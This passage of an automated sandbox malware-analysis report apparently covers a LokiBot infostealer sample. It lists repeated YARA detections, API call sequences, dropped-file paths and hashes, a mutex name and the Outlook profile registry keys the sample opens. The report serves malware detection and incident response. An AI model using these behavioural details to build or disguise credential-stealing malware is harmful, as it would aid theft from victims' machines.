                Source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: dhGoVvfmul.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                Source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.dehbibhar.exe.9e0000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 1.2.dehbibhar.exe.9e0000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.dehbibhar.exe.9e0000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 2.0.dehbibhar.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000002.00000002.519808447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000002.00000000.266214035.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000002.00000000.270121307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000002.00000000.268856991.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000002.272536894.00000000009E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000002.00000000.264898403.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_00406BFE
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_0040549C
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_004029D4
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: String function: 00405B6F appears 42 times
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\dehbibhar.exe A2FC8B5DDF220B7D9DF0E7FCC88F2EBA533698F3D178AF97A93788B614C64014
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\C79A3B\B52B3F.exe (copy) A2FC8B5DDF220B7D9DF0E7FCC88F2EBA533698F3D178AF97A93788B614C64014
                Source: dhGoVvfmul.exeVirustotal: Detection: 44%
                Source: dhGoVvfmul.exeReversingLabs: Detection: 57%
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeFile read: C:\Users\user\Desktop\dhGoVvfmul.exeJump to behavior
                Source: dhGoVvfmul.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\dhGoVvfmul.exe "C:\Users\user\Desktop\dhGoVvfmul.exe"
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeProcess created: C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess created: C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeProcess created: C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeProcess created: C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\dehbibhar.exe C:\Users\user\AppData\Local\Temp\efnvpl
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeCode function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeFile created: C:\Users\user\AppData\Local\Temp\nsg1FBC.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/6@45/1
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_004021AA CoCreateInstance,
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\dhGoVvfmul.exeCode function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\dehbibhar.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                Source: dhGoVvfmul.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: wntdll.pdbUGP source: dehbibhar.exe, 00000001.00000003.258978615.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, dehbibhar.exe, 00000001.00000003.270247242.00000000022F0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: dehbibhar.exe, 00000001.00000003.258978615.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, dehbibhar.exe, 00000001.00000003.270247242.00000000022F0000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.dehbibhar.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.dehbibhar.exe.9e0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.dehbibhar.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.dehbibhar.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.0.dehbibhar.exe.400000.9.raw.unpack, type: UNPACKEDPE
